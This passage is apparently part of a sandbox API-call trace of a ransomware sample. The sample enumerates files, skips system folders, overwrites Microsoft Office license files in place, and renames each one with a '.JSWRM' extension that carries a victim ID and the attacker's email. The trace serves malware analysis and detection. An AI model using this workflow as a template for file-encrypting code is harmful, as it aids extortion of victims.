ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe77be149, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe78ef400, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Retail-ul-phn.xrm-ms", cAlternateFileName="ONF39F~1.XRM")) returned 1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.359] lstrcmpiW (lpString1="OneNoteR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0106.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0106.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.360] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19929) returned 1 [0106.360] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0106.360] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.363] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.363] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0106.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.363] CloseHandle (hObject=0x45c) returned 1 [0106.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0106.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0106.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0106.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0106.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0106.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0106.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.363] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0106.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0106.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0106.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0106.364] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78a2f2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe78a2f2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7987d27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Trial-pl.xrm-ms", cAlternateFileName="ONCDE6~1.XRM")) returned 1 [0106.364] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0106.364] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0106.364] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0106.364] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0106.364] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0106.365] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.365] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.365] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.365] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.365] lstrcmpiW (lpString1="OneNoteR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0106.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0106.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0106.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0106.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0106.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0106.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.366] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11147) returned 1 [0106.366] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0106.366] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0106.415] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.415] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0106.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.416] CloseHandle (hObject=0x45c) returned 1 [0106.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0106.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0106.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0106.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.416] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0106.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0106.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0106.418] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe783081d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe783081d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe793b841, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5221, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Trial-ppd.xrm-ms", cAlternateFileName="OND58A~1.XRM")) returned 1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.419] lstrcmpiW (lpString1="OneNoteR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0106.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.420] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21025) returned 1 [0106.420] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5220) returned 0x24c1d0 [0106.420] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5220, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5220, lpOverlapped=0x0) returned 1 [0106.422] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.422] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5220, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5220, lpOverlapped=0x0) returned 1 [0106.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.423] CloseHandle (hObject=0x45c) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0106.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0106.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0106.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0106.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0106.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.423] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0106.424] HeapFree 